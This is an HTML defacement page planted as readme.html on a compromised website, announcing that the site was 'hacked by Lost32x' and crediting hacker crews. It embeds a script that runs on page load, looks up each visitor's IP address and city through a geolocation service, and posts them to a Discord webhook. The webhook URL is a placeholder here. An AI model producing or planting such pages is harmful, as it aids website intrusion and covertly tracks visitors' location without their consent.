File: /home/axxoncom/domains/theluvbox.pk/public_html/readme.html
<html>
<head>
<title> Hacked by Lost32x </title>
<style>
body {
        background-color: black;
        color: white;
        font-family: monospace;
        text-align: center;
}
h1 {
        color: red;
        font-size: 2rem;
}
p {
        font-size: 1rem;
}
marquee {
        font-size: 1rem;
}
</style>
</head>
<body>
<h1> Your website has been hacked by Lost32x </h1>
<p> ~6ickzone and 0wnzS3c~ </p>
<br>
<img src="https://www.creativefabrica.com/wp-content/uploads/2022/11/02/Dark-Penguin-Smoking-Weed-44311134-1.png">
<br>
<marquee> We are: 0x6ick e Lost32x! </marquee>
<script>
    // Substitua pelo seu webhook do Discord
    const webhookURL = "cu";
    // Obtem IP e localização do usuário via geolocation-db
    fetch('https://geolocation-db.com/json/')
      .then(response => response.json())
      .then(data => {
        const ip = data.IPv4 || data.ip;
        const country = data.country_name;
        const city = data.city;
        const message = `🌐 Novo acesso detectado:nn🧠 IP: ${ip}n📍 Localização: ${city}, ${country}`;
        // Envia para o webhook do Discord
        fetch(webhookURL, {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json'
          },
          body: JSON.stringify({
            content: message
          })
        });
      });
</script>
<br><br>
</body>
</html>